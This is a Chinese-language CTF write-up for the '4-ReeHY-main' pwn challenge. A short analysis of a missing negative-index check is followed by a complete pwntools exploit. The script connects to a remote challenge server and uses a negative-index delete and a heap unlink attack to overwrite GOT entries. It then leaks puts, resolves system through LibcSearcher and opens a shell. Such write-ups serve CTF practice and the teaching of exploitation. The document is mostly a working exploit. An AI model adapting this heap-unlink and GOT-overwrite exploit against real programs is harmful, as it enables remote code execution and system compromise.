4-main

程序分析

0x620c0是存放堆大小地方，edit根据这个来进行修改

0x6020e0存放堆地址的地方，可以利用unlink

而delete没有进行数字的检查，所以进行unlink时，没有修改unsorted bin的能力，于是可以输入负数到0x6020c0修改size

拿到edit(0x200)的权限

#coding:utf8    
from pwn import *  
from LibcSearcher import *  

  
context.log_level = 'debug'  
#p = process('./4-ReeHY-main')  
p = remote('111.200.241.244','62769')
#elf = ELF('./4-ReeHY-main')  
#lib = ELF('./4main.so.6')  
  
def alloc(size,index,content):  
   p.sendlineafter('$','1')  
   p.sendlineafter('Input size\n',str(size))  
   p.sendlineafter('Input cun\n',str(index))  
   p.sendafter('Input content\n',content)  
  
def delete(index):  
   p.sendlineafter('$','2')  
   p.sendlineafter('Chose one to dele\n',str(index))  
  
def edit(index,content):  
   p.sendlineafter('$','3')  
   p.sendlineafter('Chose one to edit\n',str(index))  
   p.sendafter('Input the content\n',content)  

target = 0x6020e0
p.sendlineafter('$','nidie')    
alloc(0x100,0,'aaaa')
alloc(0x100,1,'bbbb')

delete(-2)
alloc(0x14,2,p32(0x200)+p32(0x100))#we can make heap overflow
#gdb.attach(p)
#pause()

payload = p64(0)+p64(0x101)
payload += p64(target-0x18)+p64(target-0x10)
payload += 'a'*(0x100-2*0x10)
payload += p64(0x100)+p64(0x110)

edit(0,payload)
#gdb.attach(p)
#pause()
delete(1)

elf = ELF('./4-ReeHY-main')

free_got = elf.got['free']
puts_got = elf.got['puts']  
atoi_got = elf.got['atoi']  
puts_plt = elf.plt['puts']  

payload = '\x00'*0x18
payload += p64(free_got)+p64(1)
payload += p64(puts_got)+p64(1)
payload += p64(atoi_got)+p64(1)


edit(0,payload)
edit(0,p64(puts_plt))

delete(1)

puts_addr = u64(p.recv(6).ljust(8,'\x00'))  
print hex(puts_addr)    

#base = puts_addr-lib.symbols['puts']
#sys_addr = base + lib.symbols['system']
libc = LibcSearcher('puts',puts_addr)    
libc_base = puts_addr - libc.dump('puts')  
sys_addr = libc_base + libc.dump('system')

edit(2,p64(sys_addr))
p.sendlineafter('$','/bin/sh\x00')

p.interactive()